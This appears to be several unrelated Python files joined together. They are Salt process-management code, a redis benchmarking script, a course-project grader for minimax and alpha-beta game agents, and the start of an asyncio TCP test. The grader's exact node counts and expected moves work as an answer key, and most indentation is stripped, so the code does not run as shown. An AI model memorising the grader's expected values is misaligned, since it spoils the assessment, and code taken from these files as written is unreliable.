kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in self._process_map.copy().items():
if not p_map["Process"].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace("Killing pid %s: %s", pid, p_map["Process"])
try:
os.kill(pid, signal.SIGKILL)
except OSError as exc:
log.exception(exc)
# in case the process has since decided to die, os.kill returns OSError
if not p_map["Process"].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get("retry", 3)
if available_retries >= 0:
log.info(
"Some processes failed to respect the KILL signal: %s",
"; ".join(
"Process: {} (Pid: {})".format(v["Process"], k)
for ( # pylint: disable=str-format-in-logging
k,
v,
) in self._process_map.items()
),
)
log.info("kill_children retries left: %s", available_retries)
kwargs["retry"] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
"Failed to kill the following processes: %s",
"; ".join(
"Process: {} (Pid: {})".format(v["Process"], k)
for ( # pylint: disable=str-format-in-logging
k,
v,
) in self._process_map.items()
),
)
log.warning(
"Salt will either fail to terminate now or leave some "
"zombie processes behind"
)
def terminate(self):
"""
Properly terminate this process manager instance
"""
self.stop_restarting()
self.send_signal_to_processes(signal.SIGTERM)
self.kill_children()
def _handle_signals(self, *args, **kwargs):
# first lets reset signal handlers to default one to prevent running this twice
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
self.stop_restarting()
self.send_signal_to_processes(signal.SIGTERM)
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
# Terminate child processes
self.kill_children(*args, **kwargs)
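# A ProcessManager usage sketch, illustrative only (the worker target is an
# assumption): processes registered with add_process() are started immediately,
# restarted by run() when they die, and torn down together by terminate().
#
#     def worker():
#         while True:
#             time.sleep(1)
#
#     manager = ProcessManager(name="ExampleProcessManager")
#     manager.add_process(worker)
#     try:
#         manager.run()  # blocks, restarting children that exit
#     finally:
#         manager.terminate()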
class Process(multiprocessing.Process):
"""
Salt relies on this custom implementation of :py:class:`~multiprocessing.Process` to
simplify/automate some common procedures, for example, logging in the new process is
configured for "free" for every new process.
This is most important on platforms which default to ``spawn`` instead of ``fork`` for
new processes.
This is achieved by some dunder methods in the class:
* ``__new__``:
This method ensures that any arguments and/or keyword arguments that are passed to
``__init__`` are captured.
By having this information captured, we can define ``__setstate__`` and ``__getstate__``
to automatically take care of reconstructing the object state on spawned processes.
* ``__getstate__``:
This method should return a dictionary which will be used as the ``state`` argument to
:py:meth:`salt.utils.process.Process.__setstate__`.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
* ``__setstate__``:
This method reconstructs the object on the spawned process.
The ``state`` argument is constructed by the
:py:meth:`salt.utils.process.Process.__getstate__` method.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
An example of where ``__setstate__`` and ``__getstate__`` needed to be subclassed can be
seen in :py:class:`salt.master.MWorker`.
The gist of it is something like, if there are internal attributes which need to maintain
their state on spawned processes, then, subclasses must implement ``__getstate__`` and
``__setstate__`` to ensure that.
For example:
.. code-block:: python
import salt.utils.process
class MyCustomProcess(salt.utils.process.Process):
def __init__(self, opts, **kwargs):
super().__init__(**kwargs)
self.opts = opts
# This attribute, counter, should only start at 0 on the initial (parent) process.
# Any child processes need to carry the current value of the counter (instead of
# starting at zero).
self.counter = 0
def __getstate__(self):
state = super().__getstate__()
state.update(
{
"counter": self.counter,
}
)
return state
def __setstate__(self, state):
super().__setstate__(state)
self.counter = state["counter"]
"""
def __new__(cls, *args, **kwargs):
"""
This method ensures that any arguments and/or keyword arguments that are passed to
``__init__`` are captured.
By having this information captured, we can define ``__setstate__`` and ``__getstate__``
to automatically take care of object pickling which is required for platforms that
spawn processes instead of forking them.
"""
# We implement __new__ because we want to capture the passed in *args and **kwargs
# in order to remove the need for each class to implement __getstate__ and __setstate__
# which is required on spawning platforms
instance = super().__new__(cls)
instance._after_fork_methods = []
instance._finalize_methods = []
if salt.utils.platform.spawning_platform():
# On spawning platforms, subclasses should call super if they define
# __setstate__ and/or __getstate__
instance._args_for_getstate = copy.copy(args)
instance._kwargs_for_getstate = copy.copy(kwargs)
return instance
def __init__(self, *args, **kwargs):
log_queue = kwargs.pop("log_queue", None)
log_queue_level = kwargs.pop("log_queue_level", None)
super().__init__(*args, **kwargs)
self.log_queue = log_queue
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
self.log_queue_level = log_queue_level
if self.log_queue_level is None:
self.log_queue_level = salt.log.setup.get_multiprocessing_logging_level()
# Because we need to enforce our after fork and finalize routines,
# we must wrap this class run method to allow for these extra steps
# to be executed pre and post calling the actual run method,
# having subclasses call super would just not work.
#
# We use setattr here to fool pylint not to complain that we're
# overriding run from the subclass here
setattr(self, "run", self.__decorate_run(self.run))
# __setstate__ and __getstate__ are only used on spawning platforms.
def __setstate__(self, state):
"""
This method reconstructs the object on the spawned process.
The ``state`` argument is constructed by :py:meth:`salt.utils.process.Process.__getstate__`.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
"""
args = state["args"]
kwargs = state["kwargs"]
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
for (function, args, kwargs) in state["after_fork_methods"]:
self.register_after_fork_method(function, *args, **kwargs)
for (function, args, kwargs) in state["finalize_methods"]:
self.register_finalize_method(function, *args, **kwargs)
def __getstate__(self):
"""
This method should return a dictionary which will be used as the ``state`` argument to
:py:meth:`salt.utils.process.Process.__setstate__`.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
"""
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if "log_queue" not in kwargs:
kwargs["log_queue"] = self.log_queue
if "log_queue_level" not in kwargs:
kwargs["log_queue_level"] = self.log_queue_level
return {
"args": args,
"kwargs": kwargs,
"after_fork_methods": self._after_fork_methods,
"finalize_methods": self._finalize_methods,
}
def __decorate_run(self, run_func):
@functools.wraps(run_func)
def wrapped_run_func():
# Static after fork method, always needs to happen first
appendproctitle(self.name)
try:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.set_multiprocessing_logging_queue() on %s",
self,
)
try:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.set_multiprocessing_logging_level() on %s",
self,
)
try:
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.setup_multiprocessing_logging() on %s",
self,
)
for method, args, kwargs in self._after_fork_methods:
try:
method(*args, **kwargs)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run after fork callback on %s; method=%r; args=%r; and kwargs=%r",
self,
method,
args,
kwargs,
)
continue
try:
return run_func()
except SystemExit: # pylint: disable=try-except-raise
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception: # pylint: disable=broad-except
log.error(
"An un-handled exception from the multiprocessing process "
"'%s' was caught:\n",
self.name,
exc_info=True,
)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
finally:
try:
for method, args, kwargs in self._finalize_methods:
try:
method(*args, **kwargs)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run finalize callback on %s; method=%r; args=%r; and kwargs=%r",
self,
method,
args,
kwargs,
)
continue
finally:
# Static finalize method, should always run last
try:
salt.log.setup.shutdown_multiprocessing_logging()
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.shutdown_multiprocessing_logging() on %s",
self,
)
return wrapped_run_func
def register_after_fork_method(self, function, *args, **kwargs):
"""
Register a function to run after the process has forked
"""
after_fork_method_tuple = (function, args, kwargs)
if after_fork_method_tuple not in self._after_fork_methods:
self._after_fork_methods.append(after_fork_method_tuple)
def register_finalize_method(self, function, *args, **kwargs):
"""
Register a function to run when the process terminates
"""
finalize_method_tuple = (function, args, kwargs)
if finalize_method_tuple not in self._finalize_methods:
self._finalize_methods.append(finalize_method_tuple)
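# --- Illustrative sketch, not part of the original module ---------------
# A minimal example of how a subclass might use the registration hooks
# above. The class and method names (_ExampleWorker, _open_resources,
# _close_resources) are hypothetical and exist only to show the API; the
# same (function, self) call style is used by SignalHandlingProcess below.
class _ExampleWorker(Process):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Re-acquire per-process resources once the child is running; the
        # callbacks survive spawn because __getstate__/__setstate__ carry
        # them over to the new process.
        self.register_after_fork_method(_ExampleWorker._open_resources, self)
        # Release the resources when the wrapped run() returns or raises.
        self.register_finalize_method(_ExampleWorker._close_resources, self)

    def _open_resources(self):
        pass

    def _close_resources(self):
        pass

    def run(self):
        pass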
class MultiprocessingProcess(Process):
"""
This class exists for backwards compatibility and to properly deprecate it.
"""
def __init__(self, *args, **kwargs):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using '{name}.MultiprocessingProcess' and instead use "
"'{name}.Process'. '{name}.MultiprocessingProcess' will go away "
"after {{date}}.".format(name=__name__),
stacklevel=3,
)
super().__init__(*args, **kwargs)
class SignalHandlingProcess(Process):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._signal_handled = multiprocessing.Event()
self.register_after_fork_method(SignalHandlingProcess._setup_signals, self)
def signal_handled(self):
return self._signal_handled.is_set()
def _setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
self._signal_handled.set()
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
msg = "{} received a ".format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += "SIGINT"
elif signum == signal.SIGTERM:
msg += "SIGTERM"
msg += ". Exiting"
log.debug(msg)
if HAS_PSUTIL:
try:
process = psutil.Process(os.getpid())
if hasattr(process, "children"):
for child in process.children(recursive=True):
try:
if child.is_running():
child.terminate()
except psutil.NoSuchProcess:
log.warning(
"Unable to kill child of process %d, it does "
"not exist. My pid is %d",
self.pid,
os.getpid(),
)
except psutil.NoSuchProcess:
log.warning(
"Unable to kill children of process %d, it does not exist."
"My pid is %d",
self.pid,
os.getpid(),
)
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super().start()
class SignalHandlingMultiprocessingProcess(SignalHandlingProcess):
"""
This class exists for backwards compatibility and to properly deprecate it.
"""
def __init__(self, *args, **kwargs):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using '{name}.SignalHandlingMultiprocessingProcess' and"
" instead use '{name}.SignalHandlingProcess'."
" '{name}.SignalHandlingMultiprocessingProcess' will go away after"
" {{date}}.".format(name=__name__),
stacklevel=3,
)
super().__init__(*args, **kwargs)
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
try:
saved_signal = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
except ValueError as exc:
# This happens when a netapi module attempts to run a function
# using wheel_async, because the process trying to register signals
# will not be the main PID.
log.trace("Failed to register signal for signum %d: %s", signum, exc)
else:
old_signals[signum] = saved_signal
try:
# Do whatever is needed with the reset signals
yield
finally:
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
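# Illustrative sketch, not part of the original module: default_signals()
# is meant to wrap the start of a child process so the child begins with
# the default SIGINT/SIGTERM handlers instead of inheriting the parent's
# custom ones (SignalHandlingProcess.start() above does exactly this).
# The helper name and its `target` argument are hypothetical.
def _example_start_with_default_signals(target):
    proc = Process(target=target)
    with default_signals(signal.SIGINT, signal.SIGTERM):
        proc.start()
    return proc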
class SubprocessList:
def __init__(self, processes=None, lock=None):
if processes is None:
self.processes = []
else:
self.processes = processes
if lock is None:
self.lock = multiprocessing.Lock()
else:
self.lock = lock
self.count = 0
def add(self, proc):
with self.lock:
self.processes.append(proc)
log.debug("Subprocess %s added", proc.name)
self.count += 1
def cleanup(self):
with self.lock:
for proc in self.processes:
if proc.is_alive():
continue
proc.join()
self.processes.remove(proc)
self.count -= 1
log.debug("Subprocess %s cleaned up", proc.name)
|
scripts.py
|
import time
import functools
import redis
from flask import Flask, request, jsonify
from threading import Thread
from multiprocessing import Process
# from multiprocessing import Pool
pool = redis.ConnectionPool(host='127.0.0.1',
port=6379,
db=6,
encoding='utf-8',
decode_responses=True)
r = redis.StrictRedis(
connection_pool=pool
)
def direct(r):
r.sadd('test_info', '123')
r.expire('test_info', 2)
r.get('redis_test')
r.set('redis_test', 5)
r.expire('redis_test', 10)
def incry(r):
m = r.incr('test_incry')
print(m)
def pipeline(r):
p = r.pipeline()
p.sadd('test_info', '123')
p.expire('test_info', 2)
p.get('redis_test')
p.set('redis_test', 5)
p.expire('redis_test', 10)
p.execute()
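# Illustrative sketch, not part of the original script: redis-py pipelines
# can also be used as context managers, which resets the pipeline even if
# execute() raises; behaviour is assumed to match redis-py's Pipeline API.
def pipeline_ctx(r):
    with r.pipeline() as p:
        p.sadd('test_info', '123')
        p.expire('test_info', 2)
        p.get('redis_test')
        p.set('redis_test', 5)
        p.expire('redis_test', 10)
        p.execute()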
def main():
s = time.time()
for _ in range(0,50000):
pipeline(r)
print(time.time() - s)
def run_1(r):
for _ in range(0, 1000):
incry(r)
def multi_main():
# jobs = [Process(target=run_1, args=(r,)) for x in range(0,5)]
jobs = [Thread(target=run_1, args=(r,)) for x in range(0,5)]
print(jobs)
s = time.time()
for j in jobs:
j.start()
for j in jobs:
j.join()
print(time.time() - s)
if __name__ == "__main__":
main()
# multi_main()
# python -m cProfile -o test.pstats scripts.py
# python -m cProfile -s cumulative scripts.py
# snakeviz test.pstats
# gprof2dot -f pstats test.pstats | dot -Tpng -o output.png && eog output.png
# kernprof -l -v scripts.py
# python -m line_profiler scripts.py.lprof
# 5000 iterations, 5 processes, 0.5s - pipeline
# 5000 iterations, 5 processes, 0.9s - plain connection
#
|
agent_test.py
|
"""
This file contains test cases to verify the correct implementation of the
functions required for this project including minimax, alphabeta, and iterative
deepening. The heuristic function is tested for conformance to the expected
interface, but cannot be automatically assessed for correctness.
STUDENTS SHOULD NOT NEED TO MODIFY THIS CODE. IT WOULD BE BEST TO TREAT THIS
FILE AS A BLACK BOX FOR TESTING.
"""
import random
import unittest
import timeit
import sys
import isolation
import game_agent
from collections import Counter
from copy import deepcopy
from copy import copy
from functools import wraps
from queue import Queue
from threading import Thread
from multiprocessing import TimeoutError
from queue import Empty as QueueEmptyError
from importlib import reload
WRONG_MOVE = """
The {} function failed because it returned a non-optimal move at search depth {}.
Valid choices: {}
Your selection: {}
"""
WRONG_NUM_EXPLORED = """
Your {} search visited the wrong nodes at search depth {}. If the number
of visits is too large, make sure that iterative deepening is only
running when the `iterative` flag is set in the agent constructor.
Max explored size: {}
Number you explored: {}
"""
UNEXPECTED_VISIT = """
Your {} search did not visit the number of expected unique nodes at search
depth {}.
Max explored size: {}
Number you explored: {}
"""
ID_FAIL = """
Your agent explored the wrong number of nodes using Iterative Deepening and
minimax. Remember that ID + MM should check every node in each layer of the
game tree before moving on to the next layer.
"""
INVALID_MOVE = """
Your agent returned an invalid move. Make sure that your function returns
a selection when the search times out during iterative deepening.
Valid choices: {!s}
Your choice: {}
"""
TIMER_MARGIN = 15 # time (in ms) to leave on the timer to avoid timeout
def curr_time_millis():
"""Simple timer to return the current clock time in milliseconds."""
return 1000 * timeit.default_timer()
def handler(obj, testcase, queue):
"""Handler to pass information between threads; used in the timeout
function to abort long-running (i.e., probably hung) test cases.
"""
try:
queue.put((None, testcase(obj)))
except:
queue.put((sys.exc_info(), None))
def timeout(time_limit):
"""Function decorator for unittest test cases to specify test case timeout.
The timer mechanism works by spawning a new thread for the test to run in
and using the timeout handler for the thread-safe queue class to abort and
kill the child thread if it doesn't return within the timeout.
It is not safe to access system resources (e.g., files) within test cases
wrapped by this timer.
"""
def wrapUnitTest(testcase):
@wraps(testcase)
def testWrapper(self):
queue = Queue()
try:
p = Thread(target=handler, args=(self, testcase, queue))
p.daemon = True
p.start()
err, res = queue.get(timeout=time_limit)
p.join()
if err:
raise err[0](err[1]).with_traceback(err[2])
return res
except QueueEmptyError:
raise TimeoutError("Test aborted due to timeout. Test was " +
"expected to finish in less than {} second(s).".format(time_limit))
return testWrapper
return wrapUnitTest
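# Illustrative sketch, not part of the original suite (kept as a comment so
# it is not collected as a real test): the decorator above is applied to
# individual unittest methods, e.g.
#
#     class ExampleTimeoutUsage(unittest.TestCase):
#
#         @timeout(1)
#         def test_finishes_quickly(self):
#             self.assertEqual(sum(range(10)), 45)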
def makeEvalTable(table):
"""Use a closure to create a heuristic function that returns values from
a table that maps board locations to constant values. This supports testing
the minimax and alphabeta search functions.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
row, col = game.get_player_location(player)
return table[row][col]
return score
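# Illustrative sketch, not part of the original suite: build a tiny table
# where only the centre cell scores and wrap it with makeEvalTable(); the
# returned callable has the (game, player) signature used by these tests.
# The helper name is hypothetical and never called by the suite.
def _example_eval_table():
    table = [[0, 0, 0],
             [0, 5, 0],
             [0, 0, 0]]
    return makeEvalTable(table)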
def makeEvalStop(limit, timer, value=None):
"""Use a closure to create a heuristic function that forces the search
timer to expire when a fixed number of node expansions have been performed
during the search. This ensures that the search algorithm is always
in a predictable state regardless of node expansion order.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if timer.time_left() < 0:
raise TimeoutError("Timer expired during search. You must " +
"return an answer before the timer reaches 0.")
if limit == game.counts[0]:
timer.time_limit = 0
return 0
return score
def makeBranchEval(first_branch):
"""Use a closure to create a heuristic function that evaluates to a nonzero
score when the root of the search is the first branch explored, and
otherwise returns 0. This heuristic is used to force alpha-beta to prune
some parts of a game tree for testing.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if not first_branch:
first_branch.append(game.root)
if game.root in first_branch:
return 1.
return 0.
return score
class CounterBoard(isolation.Board):
"""Subclass of the isolation board that maintains counters for the number
of unique nodes and total nodes visited during depth first search.
Some functions from the base class must be overridden to maintain the
counters during search.
"""
def __init__(self, *args, **kwargs):
super(CounterBoard, self).__init__(*args, **kwargs)
self.counter = Counter()
self.visited = set()
self.root = None
def copy(self):
new_board = CounterBoard(self.__player_1__, self.__player_2__,
width=self.width, height=self.height)
new_board.move_count = self.move_count
new_board.__active_player__ = self.__active_player__
new_board.__inactive_player__ = self.__inactive_player__
new_board.__last_player_move__ = copy(self.__last_player_move__)
new_board.__player_symbols__ = copy(self.__player_symbols__)
new_board.__board_state__ = deepcopy(self.__board_state__)
new_board.counter = self.counter
new_board.visited = self.visited
new_board.root = self.root
return new_board
def forecast_move(self, move):
self.counter[move] += 1
self.visited.add(move)
new_board = self.copy()
new_board.apply_move(move)
if new_board.root is None:
new_board.root = move
return new_board
@property
def counts(self):
""" Return counts of (total, unique) nodes visited """
return sum(self.counter.values()), len(self.visited)
class Project1Test(unittest.TestCase):
def initAUT(self, depth, eval_fn, iterative=False,
method="minimax", loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.CustomPlayer(depth, eval_fn, iterative, method)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
@timeout(5)
# @unittest.skip("Skip eval function test.") # Uncomment this line to skip test
def test_heuristic(self):
""" Test output interface of heuristic score function interface."""
player1 = "Player1"
player2 = "Player2"
p1_location = (0, 0)  # top left corner
p2_location = (1, 1)
game = isolation.Board(player1, player2)
game.apply_move(p1_location)
game.apply_move(p2_location)
self.assertIsInstance(game_agent.custom_score(game, player1), float,
"The heuristic function should return a floating point")
# @timeout(5)  # Uncomment this line to enforce the test timeout
# @unittest.skip("Skip simple minimax test.") # Uncomment this line to skip test
def test_minimax_interface(self):
""" Test CustomPlayer.minimax interface with simple input """
h, w = 7, 7 # board size
test_depth = 1
starting_location = (5, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.minimax(next_state, test_depth)
self.assertTrue(type(v) == float,
("Minimax function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
# @timeout(5)  # Uncomment this line to enforce the test timeout
# @unittest.skip("Skip alphabeta test.") # Uncomment this line to skip test
def test_alphabeta_interface(self):
""" Test CustomPlayer.alphabeta interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "alphabeta"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.alphabeta(next_state, test_depth)
self.assertTrue(type(v) == float,
("Alpha Beta function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
@timeout(5)
# @unittest.skip("Skip get_move test.") # Uncomment this line to skip test
def test_get_move_interface(self):
""" Test CustomPlayer.get_move interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
# Test that get_move returns a legal choice on an empty game board
board = isolation.Board(agentUT, 'null_agent', w, h)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on an " +
"empty board. It should return coordinates on the " +
"game board for the location of the agent's next " +
"move. The move must be one of the legal moves on " +
"the current game board."))
# Test that get_move returns a legal choice for first move as player 2
board = isolation.Board('null_agent', agentUT, w, h)
board.apply_move(starting_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed making the first " +
"move as player 2 on a new board. It should return " +
"coordinates on the game board for the location " +
"of the agent's next move. The move must be one " +
"of the legal moves on the current game board."))
# Test that get_move returns a legal choice after first move
board = isolation.Board(agentUT, 'null_agent', w, h)
board.apply_move(starting_location)
board.apply_move(adversary_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on a " +
"game in progress. It should return coordinates on" +
"the game board for the location of the agent's " +
"next move. The move must be one of the legal moves " +
"on the current game board."))
@timeout(5)
# @unittest.skip("Skip minimax test.") # Uncomment this line to skip test
def test_minimax(self):
""" Test CustomPlayer.minimax
This test uses a scoring function that returns a constant value based
on the location of the search agent on the board to force minimax to
choose a branch that visits those cells at a specific fixed-depth.
If minimax is working properly, it will visit a constant number of
nodes during the search and return one of the acceptable legal moves.
"""
h, w = 7, 7 # board size
starting_location = (2, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "minimax"
# The agent under test starts at position (2, 3) on the board, which
# gives eight (8) possible legal moves [(0, 2), (0, 4), (1, 1), (1, 5),
# (3, 1), (3, 5), (4, 2), (4, 4)]. The search function will pick one of
# those moves based on the estimated score for each branch. The value
# only changes on odd depths because even depths end when the
# adversary has the initiative.
value_table = [[0] * w for _ in range(h)]
value_table[1][5] = 1 # depth 1 & 2
value_table[4][3] = 2 # depth 3 & 4
value_table[6][6] = 3 # depth 5
heuristic = makeEvalTable(value_table)
# These moves are the branches that will lead to the cells in the value
# table for the search depths.
expected_moves = [set([(1, 5)]),
set([(3, 1), (3, 5)]),
set([(3, 5), (4, 2)])]
# Expected number of node expansions during search
counts = [(8, 8), (24, 10), (92, 27), (418, 32), (1650, 43)]
# Test fixed-depth search; note that odd depths mean that the searching
# player (student agent) has the last move, while even depths mean that
# the adversary has the last move before calling the heuristic
# evaluation function.
for idx in range(5):
test_depth = idx + 1
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.minimax(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, expected_moves[idx // 2], WRONG_MOVE.format(
method, test_depth, expected_moves[idx // 2], move))
@timeout(20)
# @unittest.skip("Skip alpha-beta test.") # Uncomment this line to skip test
def test_alphabeta(self):
""" Test CustomPlayer.alphabeta
This test uses a scoring function that returns a constant value based
on the branch being searched by alphabeta in the user agent, and forces
the search to prune on every other branch it visits. By using a huge
board where the players are too far apart to interact and every branch
has the same growth factor, the expansion and pruning must result in
an exact number of expanded nodes.
"""
h, w = 101, 101 # board size
starting_location = (50, 50)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "alphabeta"
# The agent under test starts in the middle of a huge board so that
# every branch has the same number of possible moves, so pruning any
# branch has the same effect during testing
# These are the expected number of node expansions for alphabeta search
# to explore the game tree to fixed depth. The custom eval function
# used for this test ensures that some branches must be pruned, while
# the search should still return an optimal move.
counts = [(8, 8), (17, 10), (74, 42), (139, 51), (540, 119)]
for idx in range(len(counts)):
test_depth = idx + 1 # pruning guarantee requires min depth of 3
first_branch = []
heuristic = makeBranchEval(first_branch)
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location,
w=w, h=h)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.alphabeta(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, first_branch, WRONG_MOVE.format(
method, test_depth, first_branch, move))
@timeout(20)
# @unittest.skip("Skip iterative deepening test.") # Uncomment this line to skip test
def test_get_move(self):
""" Test iterative deepening in CustomPlayer.get_move by placing an
agent on the game board and performing ID minimax search, which
should visit a specific number of unique nodes while expanding. By
forcing the search to timeout when a predetermined number of nodes
have been expanded, we can then verify that the expected number of
unique nodes have been visited.
"""
class DynamicTimer():
"""Dynamic Timer allows the time limit to be changed after the
timer is initialized so that the search timeout can be triggered
before the timer actually expires. This allows the timer to expire
when an event occurs, regardless of the clock time required until
the event happens.
"""
def __init__(self, time_limit):
self.time_limit = time_limit
self.start_time = curr_time_millis()
def time_left(self):
return self.time_limit - (curr_time_millis() - self.start_time)
w, h = 11, 11 # board size
adversary_location = (0, 0)
method = "minimax"
# The agent under test starts at the positions indicated below, and
# performs an iterative deepening minimax search (minimax is easier to
# test because it always visits all nodes in the game tree at every
# level).
origins = [(2, 3), (6, 6), (7, 4), (4, 2), (0, 5), (10, 10)]
exact_counts = [(8, 8), (32, 10), (160, 39), (603, 35), (1861, 54), (3912, 62)]
for idx in range(len(origins)):
# set the initial timer high enough that the search will not
# timeout before triggering the dynamic timer to halt by visiting
# the expected number of nodes
time_limit = 1e4
timer = DynamicTimer(time_limit)
eval_fn = makeEvalStop(exact_counts[idx][0], timer, time_limit)
agentUT, board = self.initAUT(-1, eval_fn, True, method,
origins[idx], adversary_location,
w, h)
legal_moves = board.get_legal_moves()
chosen_move = agentUT.get_move(board, legal_moves, timer.time_left)
diff_total = abs(board.counts[0] - exact_counts[idx][0])
diff_unique = abs(board.counts[1] - exact_counts[idx][1])
self.assertTrue(diff_total <= 1 and diff_unique == 0, ID_FAIL)
self.assertTrue(chosen_move in legal_moves, INVALID_MOVE.format(
legal_moves, chosen_move))
if __name__ == '__main__':
unittest.main()
|
test_tcp.py
|
import asyncio
import asyncio.sslproto
import gc
import os
import select
import socket
import unittest.mock
import ssl
import sys
import threading
import time
import weakref
from OpenSSL import SSL as openssl_ssl
